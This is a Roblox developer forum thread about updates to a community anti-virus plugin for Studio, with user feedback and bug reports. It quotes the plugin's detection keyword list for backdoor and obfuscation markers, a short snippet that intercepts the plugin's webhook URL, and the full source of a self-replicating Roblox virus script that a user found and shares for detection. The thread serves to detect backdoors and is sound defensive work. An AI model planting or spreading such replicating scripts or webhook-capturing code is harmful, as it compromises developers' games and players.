GameGuard Anti Virus V2 [ALPHA]

Updated!

GameGaurd Anti Virus has updated! I have taken all the recommendations and made the plugin way better!

What’s new?

• Bug fixes.
• Optimized scanning for low-end devices.
• New whitelisting system!.
• Option if you want to scan for require.
• Cool new animations to give a higher quality feel.

Previews?

To open up the whitelisting menu, click on the Settings button!

(I don’t know why the icon doesn’t show up )

image1289×631 18.6 KB

How do I update?

You can just go to Plugins > Manage Plugins > Update All.

Thank you!

Thank you guys and girls for supporting me through this plugin development; it motivates me to roll out more updates and keep everyone safer. Thank you @Ciyob86 for giving me lots of amazing ideas!

I recommend whitelisting being something that can only be done through being detected first. Having to input a script name would cause ambiguity. A lot of developers have duplicate names (specifically the defualt script names), and that leaves high possibility to whitelist a script that shares the name of a false positive.

If a script gets detected, add a whitelist button and a Go To Script button just to be a little bit safe, and instead convert the whitelist window to a “remove whitelist” window in case someone wants to remove from the whitelist.

Just a thought.

That was also added, you right click on the button.

Thank you for the suggestion!

Amazing! Might even use this in my cafe, thanks for adapting to my feedback.

Update

GameGaurd Anti Virus just keeps on updating! This isn’t a big one, but worth telling the community.

Changelog

• Fixed bugs with scanning
• Optional “logs”

What are these… logs?

The logs log only three pieces of information; the time it took the anti-virus to load up, and the time it took to scan __ scripts and your player ID.
If you don’t feel conformable with us logging this information for future optimization, you can opt-out by clicking on this button in the Settings menu;

image768×297 11.7 KB

The end

This wasn’t a big update, but I think it was needed to be announced so I wouldn’t get backlash. Thank you!

This plugin is DECENT, but I wouldn’t use it every day to find viruses.

Here are a couple of problems:

The plugin’s keywords lack CONTEXT. For instance, require(workspace.MyModule) is different than require(230224189). The first one isn’t malicious, though the second one is probably malicious.
You can change the require keyword to require(%d, which only will be found if the first number is a digit. (only works if your using string.match, I didn’t check if you were)
That should lower false positives.

Some of your keywords should be removed. Most of these don’t really do anything.
For instance, getsenv, luraph, synapse, insert.
getsenv isn’t a valid Roblox function, luraph and synapse wouldn’t be mentioned, and Inserting models requires them to be owned by the creator. (If you own a backdoor, that’s on you).

If your wondering, these are all of their keywords as of now.

{"require", "luraph", "synapse", "loadstring", "getfenv", "getsenv", "setfenv", "IsStudio", ":Run()", "hint", "\114\101\113\117\105\114\101", "il1", "TeleportService:Teleport", "TeleportService", "lIl", "ILIL", "III", "Eriuqur", "Insert"}

Also, you shouldn’t have a webhook inside your plugin as the link can easily be stolen.
Discord isn’t a logging service either.

local oldgameref = game
local game = {}
function game:GetService()
local ret = {}
function ret:PostAsync(url)
print(url)
end
return ret
end

Anyways, I guess it’s decent if your a new developer, but for serious and modular development this will return a ton of false positives.

Some backdoor plugins will also insert a backdoor into an already created script, so if you whitelist a script, then they insert the backdoor code, you will not see the newly created backdoor.

Currently, false positives barely happen. They do, sure, but after all the updates (updated keywords, scan for require, whitelisting) I have not gotten a false positive other than adonis which you can just whitelist.

Inserting models are needed to be owned by the owner which he might own a backdoor
luraph and synapse are widely used as a custom variable in obfuscations.

Thank you for these roasts, I will try to fix my plugin as soon as possible!

I would recommend it to be No for search for require.
Since most admin scripts use require

But the plugin’s good!

Update

Man, GameGuard keeps on updating! Lets see what new we have in this update…

Changelog

• Faster loading (thanks to the logging)
• Finished logging
• New Quarantine system!
• New context menu!
• Fixed bugs with removing threats

Previews?

To quarantine or view a detected threat, right-click on a threat that was detected in the Results.

image901×583 72 KB

As you can see, you can quarantine/view a script with the context menu. More options will come soon, such as whitelisting.
Viewing a script does what expected; opens up the script.

What is this… quarantine?

Please remember that quarantining could have bugs; it was just made.
Quarantining a script does 3 things:

• Disables the script from running
• Comments out the script
• Puts the script into the new folder, “[GAMEGUARD] Quarantined” in ServerScriptService.

How do I update?

You can just go to Plugins > Manage Plugins > Update All.

The end.

Thank you, everyone, for supporting me through this journey. Without you I wouldn’t be working on this plugin day and night!
Now, lets become the best Roblox Antivirus!

Tysm, a think I might have had a malicous plug in. I never knew my game infected was that bad lol.

You can now quarantine scripts in quarantine!

Yes but antivirus scripts in game are only caused by freemodels, and you can simply delete the scripts in models or look through them manually. It honestly does not take much time. If you open up a script and you see that you can scroll for a long time, that means it is a virus. That is pretty much all information you need.

Not always.
These come from plugins as well, and sometimes creators of big plugins slip in a backdoor into it. This plugin will detect those.

Yes, but these aren’t the only type of viruses… some of them are “hidden” (this plugin will also detect them). You can read about them here.

It takes lots of time to remove a backdoor, especially if inserted via plugin. Plugins have the ability to run code in studio, which means they can make the script be unremovable.
But free models can take a pretty long time to remove the viruses as well. Let’s say you insert a cafe; or a house for example. You will need to search every 1k part in the model for a script, and there is probably over 15 scripts in such free model which can take lots of time to search through for malicious keywords. This plugin will automate the search and secure your game.

Well if it for plugins, you make a good point there. However, you can still check the plugin’s contents in studio.

You can, but that doesn’t mean the malicious scripts arent hidden.

I found this script in my game that breaks mesh vehicles. There were multiple instances of this script in the game.

if (script.Parent == workspace) then
	function checkForAndSwitch(player)
		if (player.SuperSafeChat == true) then
			player.SuperSafeChat = false;
			wait(5);
			local m = Instance.new("Message");
			m.Text = "Press the / key to start typing.";
			m.Parent = player;
			wait(5);
			m.Text = "Then press Enter to send your message.";
			wait(5);
			m:Remove();
			m = nil;
		end
		player = nil;
		collectgarbage("collect");
	end

	function onChildAddedToPlayers(obj)
		if (obj.className == "Player") then
			checkForAndSwitch(obj);
			local m = Instance.new("Message");
			m.Text = "Have fun!";
			m.Parent = obj;
			wait(5);
			m:Remove();
			m = nil;
		end
		obj = nil;
		collectgarbage("collect");
	end

	function onChildAddedToWorkspace(obj)
		if (obj.className == "Model") then
			if (game.Players:playerFromCharacter(obj) ~= nil) then
				checkForAndSwitch(game.Players:playerFromCharacter(obj));
			end
		end
		obj = nil;
		collectgarbage("collect");
	end

	function findLowestLevel(obj)
		local c = obj:GetChildren();
		local lowestLevel = true;

		for i, v in pairs(c) do
			if (v.className == "Model" or v.className == "Tool" or v.className == "HopperBin" or v == workspace or v == game.Lighting or v == game.StarterPack) then
				lowestLevel = false;
				wait();
				findLowestLevel(v);
			end
		end

		if (obj ~= workspace and lowestLevel == true and (obj:FindFirstChild(script.Name) == nil)) then
			if (obj ~= game.Lighting and obj ~= game.StarterPack) then
				local s = script:Clone();
				s.Parent = obj;
			end
		end
	end

	findLowestLevel(game);

	game.Players.ChildAdded:connect(onChildAddedToPlayers);
	game.Workspace.ChildAdded:connect(onChildAddedToWorkspace);
else
	local findScript = workspace:FindFirstChild(script.Name);

	if (findScript == nil) then
		local s = script:Clone();
		s.Parent = workspace;
	end
end

--[[function findAllCopies(obj)
	local c = obj:GetChildren();

	for i, v in pairs(c) do
		if (v.Name == script.Name and v.className == "Script" and v ~= script) then
			v.Parent = nil;
		elseif (v.className == "Model" or v.className == "Tool" or v.className == "HopperBin" or v == workspace or v == game.Lighting or v == game.StarterPack) then
			findAllCopies(v);
		end
	end
end

findAllCopies(game);

script.Parent = nil;]]

Thanks! I will use that for future detection updates!

Could you maybe remove some of the unnecessary prints whenever I press enter?

Like this:

game:GetService("UserInputService").InputBegan:Connect(function(userInput)
	if userInput.KeyCode == Enum.KeyCode.Return then
		good = true
		for i,v in pairs(whitelisted) do
			print(v," | ",i) -- This part
			if input.Text == v then
				good = false
			end
		end

It will stop some of the clutter that I get when testing something that needs the Enter key

Yes, I will remove that in the next update!

This is great! I used to use Ro-Defender but I think this is better